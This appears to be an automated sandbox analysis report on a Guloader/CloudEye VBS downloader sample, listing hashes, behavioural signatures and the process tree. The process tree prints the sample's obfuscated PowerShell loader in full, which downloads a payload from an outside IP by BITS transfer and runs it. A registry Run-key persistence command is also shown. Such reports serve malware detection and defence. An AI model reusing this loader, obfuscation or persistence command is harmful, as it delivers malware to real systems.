Analysis
-
max time kernel
152s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12/04/2023, 03:42
Static task
static1
Behavioral task
behavioral1
Sample
a75c770acab8755ebc617f8925eff3b4.vbs
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
a75c770acab8755ebc617f8925eff3b4.vbs
Resource
win10v2004-20230220-en
General
-
Target
a75c770acab8755ebc617f8925eff3b4.vbs
-
Size
34KB
-
MD5
a75c770acab8755ebc617f8925eff3b4
-
SHA1
3368ba6a1379d325bd9f0ccfe207f4963217b9c9
-
SHA256
926fe7f70c86b5c16a632344191820206772f8c53ac075446b138d209a1bf22a
-
SHA512
2f98c7848fcb81dc39772bc3129be29c3f22ebce2cca03da3150e9f75e2f9fd472ef4301782f91c23f65a9d6f93957e653862f723b5f99293f609430caa715a6
-
SSDEEP
768:UObC4BcJLusxj/gqJ77UkZb3d8IbXK4HkMsFkafl:J24B2usBveebNzb6kul
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 5116 WScript.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows\CurrentVersion\Run ieinstal.exe Set value (str) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Amidoplast = "%TORO% -w 1 $Inde=(Get-ItemProperty -Path 'HKCU:\\bandernes\\').Semipas;%TORO% ($Inde)" ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 4584 ieinstal.exe 4584 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4700 powershell.exe 4584 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4700 set thread context of 4584 4700 powershell.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2256 powershell.exe 2256 powershell.exe 4700 powershell.exe 4700 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 4700 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4584 ieinstal.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 5116 wrote to memory of 2256 5116 WScript.exe 84 PID 5116 wrote to memory of 2256 5116 WScript.exe 84 PID 2256 wrote to memory of 4700 2256 powershell.exe 86 PID 2256 wrote to memory of 4700 2256 powershell.exe 86 PID 2256 wrote to memory of 4700 2256 powershell.exe 86 PID 4700 wrote to memory of 4584 4700 powershell.exe 96 PID 4700 wrote to memory of 4584 4700 powershell.exe 96 PID 4700 wrote to memory of 4584 4700 powershell.exe 96 PID 4700 wrote to memory of 4584 4700 powershell.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a75c770acab8755ebc617f8925eff3b4.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4584
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82